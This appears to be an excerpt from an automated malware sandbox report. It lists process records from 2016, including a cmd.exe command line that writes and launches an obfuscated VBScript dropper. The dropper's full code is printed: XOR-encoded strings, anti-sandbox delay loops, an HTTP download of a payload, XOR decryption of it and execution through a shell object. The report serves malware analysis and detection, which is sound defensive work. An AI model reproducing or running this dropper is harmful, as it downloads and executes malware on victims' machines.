Wow64 process (32bit): | false |
Commandline: | C:\Windows\System32\cmd.exe /V /C set GBG=C:\Users\admin\AppData\Roaming\%RANDOM%.vbs && (for %i in ( DIm DxF3znV FunCTIoN RM7H(TqP SUpcFxy) BCGW2=65 dIM Qiw O2ErlP PEd4 Qo1rh7B=85 fOr Qiw=1 tO (Len(TqP)/2) O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP (Qiw+Qiw)-1 2))) PEd4=(MZrD(Mid(SUpcFxy ((Qiw moD LEn(SUpcFxy))+1) 1))) RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP PEd4)) NEXt RCTUfL=22 EnD fUncTIOn Cllae0=23 KyzlwC sUB KyzlwC() OF=45 DIm Tw Jl WC8fC Ui=84 Tw=96824294 KNatGfc=89 FOr Jl=1 tO Tw WC8fC=WC8fC+1 NexT Xt=77 iF WC8fC=Tw Then Ep8UXJ=64 Mule6z((1336770/4951)) DFyX5SF=24 PbE0o(RM7H( 2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30 WCM )) N08kbpy=70 eLsE TeDg=46 SG5Ave=28 EnD iF TSoUPG=33 EnD suB FUnCTIoN XtPB7z2(C9NbQom) PkAKI0E=14 XtPB7z2=Chr(C9NbQom) LK=15 eND FuNCTiON SuB Wusodn4() XuOFto5=43 Dim UQFOGB KJk For UQFOGB = 38 To 9000267 KJk = RyQrP + 83 + 80 + 90 Next DVYff=1 End sUB SUb M0cJLn() NM=43 diM VW ELc PCds BjuC5aE NH=28 PCds= Mt=19 ELc=DxF3znV & TKsHu & RM7H( 7D045507 NSp8wZ0 ) RQwDOV=4 MNs9uB DxF3znV ELc O5t=91 iF BjuC5aE= THen Mule6z(4) L1ksUsW=17 VW= SIrWOMB LwjuV=31 SEt BwZn=cREaTeOBject(RM7H( 1E21343D24322767213F2A212E VW)) BVv1A=80 BwZn.RUn RM7H( 2D1C2F6F1D4E266E5E08612B62021C256B635A1661 CNqKAx6 ) & ELc & PCds 8134-8134 2260-2260 TIbnnCE=13 End Sub SuB SsQ() P1t=5 dIM NgoLmHV TGr Cv80c3=62 Do WhIle NgoLmHV<>5317-5316 TGr=TGr+1 WSCript.sLEEP(28) Loop D1zerr=83 EnD sUB sUb Mule6z(RevOKyJ) WQ50Sb6=91 DiM LpZsh QW=34 LpZsh=timER+RevOKyJ dO whIle TiMeR<LpZsh wSCRiPt.Sleep(2) Loop Er8g9=8 EnD sUB fUNCtion TKsHu() GtkE=70 TKsHu=SecONd(TImE) OZgqxC=48 enD fUnCTioN FUncTioN PbE0o(SE1cf) ReuR=18 dIM RAOx XkSvP CNlxWn EPNWwO PQMM YVYNy=1 On erroR reSUmE NeXt ARJH8=74 CNlxWn= QAMNVmL R0VOo=25 sET RAOx=crEATEobjECT(RM7H( 161E2D24043C256F1E26330120 CNlxWn)) LRRQfm=62 Wusodn4 X77kzx=91 Set OAmVp=RAOx.ENVirOnMeNT(RM7H( 33250E20321230 Acw )) XIzNEID=1 DxF3znV=OAmVp(RM7H( 13110413131515 WRAT ))&XtPB7z2((830-738))& TKsHu & TKsHu TC3=16 EPNWwO= IHCr I5DpS=10 SeT XkSvP=crEatEobJEcT(RM7H( 052A113B27301D2F3C6D2A04040B261D18 EPNWwO)) KU=48 XkSvP.OPen RM7H( 0E713D XI4i0 ) SE1cf 9990-9990 Ie=16 XkSvP.SEtRequeSTheaDer RM7H( 1F5409572A QM5g0OA ) RM7H( 3320022422644371686A5B AQYv ) YYYHtq1=70 XkSvP.SEnD() X0E0=33 if XkSvP.STAtuSTExt=RM7H( 13122A371A392F531B2C1D2C261D2C XCs ) then SqN2=57 Wusodn4 GX=46 Mule6z(4) Yad=55 FH XkSvP.rEspoNseBoDY MMA=83 Else Wuc8=82 PQMM= E3rz X6KS=14 SeT XkSvP= creatEoBJECt(RM7H( 7E1B19375C011523475C22087F3A2E1163 PQMM)) BjdWH=29 XkSvP.OpeN RM7H( 292B35 Mnna0kE ) RM7H( 5E30324074196B2F5423572D355F20182A2344615033685A3E51 N6DF0 ) 9751-9751 VcHw=29 XkSvP.sEtrEqUeSTHEaDEr RM7H( 332E0F2804 Oa ) RM7H( 542A4628456E077D0F601F M6S2 ) VMX=37 XkSvP.SEnD() QSABO=86 If XkSvP.StatUSTeXT=RM7H( 2350304D252E1F110156223B165F36 Os1B9L ) tHEn FH XkSvP.responSeBODy I3D=66 Jhd=59 end if OFqx1=45 End FUncTIOn sUb FH(YAuf) Yn=86 dIm M5 Y9zz983 O9zJmIO=30 Y9zz983= XF PMY=63 SEt M5=createObJECt(RM7H( 071C091C0476152C343D2735 Y9zz983)) VZ1=19 M5.OpeN YVIgE=35 M5.TYpE=9542-9541 FH5xrC=28 M5.WritE YAuf WN8ajm=73 M5.sAVetoFiLe DxF3znV 5206-5204 QKYC=21 M5.cLoSE FzUz8m=8 M0cJLn Iw6Z=36 eND SUb funcTioN MZrD(QAd) JrGZqM=95 MZrD=ASc(QAd) GvVffY=48 enD FuNcTiON funCTion MNs9uB(LXzuy NUa) SOv6=61 dIm GH7 KJkz AdyAC OPkR Fp(7) KA=45 Fp(1)=106 IXQyb=39 Fp(6)=115 CFw=41 Fp(2)=118 RwOAf4r=86 Fp(3)=103 U0r=78 Fp(7)=111 MJ56ht=71 Fp(4)=116 KTBrm=13 Fp(0)=115 CtMg=90 Fp(5)=104 GJQ=89 PSKfp1=28 sET GH7=cREaTEobjEct(RM7H( 002431302538253D206D1F3C2029003E302D302103312D263A21 LSGCYUL )) PeN5TC8=50 Set KJkz=GH7.gETfilE(LXzuy) XcYZQp=30 sET OPkR=KJkz.oPenastExtstrEaM(733-732 8036-8036) DXG=52 sEt AdyAC=GH7.CREaTETextFile(NUa 239-238 3016-3016) RU0xHi=89 dO UntIl OPkR.AtENdOfstrEam AdyAC.WrITe XtPB7z2(KLGYdz(MZrD(OPkR.reAd(4298-4297)) Fp(0))) LOOp Uu48fY=88 AdyAC.CLOse Oc=29 OPkR.CLOse FTHurcs=65 End fuNCtIOn fUNCtIon KLGYdz(Qtoxg Fjo) RsgNc=91 KLGYdz=(Qtoxg ANd Not Fjo)Or(noT Qtoxg aND Fjo) Pq4oC=28 eNd fUnction ) do @echo %~i)> !GBG! && start !GBG! |
Imagebase: | 0x77640000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 16:33:00 |
Start date: | 07/07/2016 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\System32\WScript.exe C:\Users\admin\AppData\Roaming\17438.vbs |
Imagebase: | 0x77640000 |
File size: | 141824 bytes |
MD5 hash: | 979D74799EA6C8B8167869A68DF5204A |
Programmed in: | C, C++ or other language |
Disassembly |
---|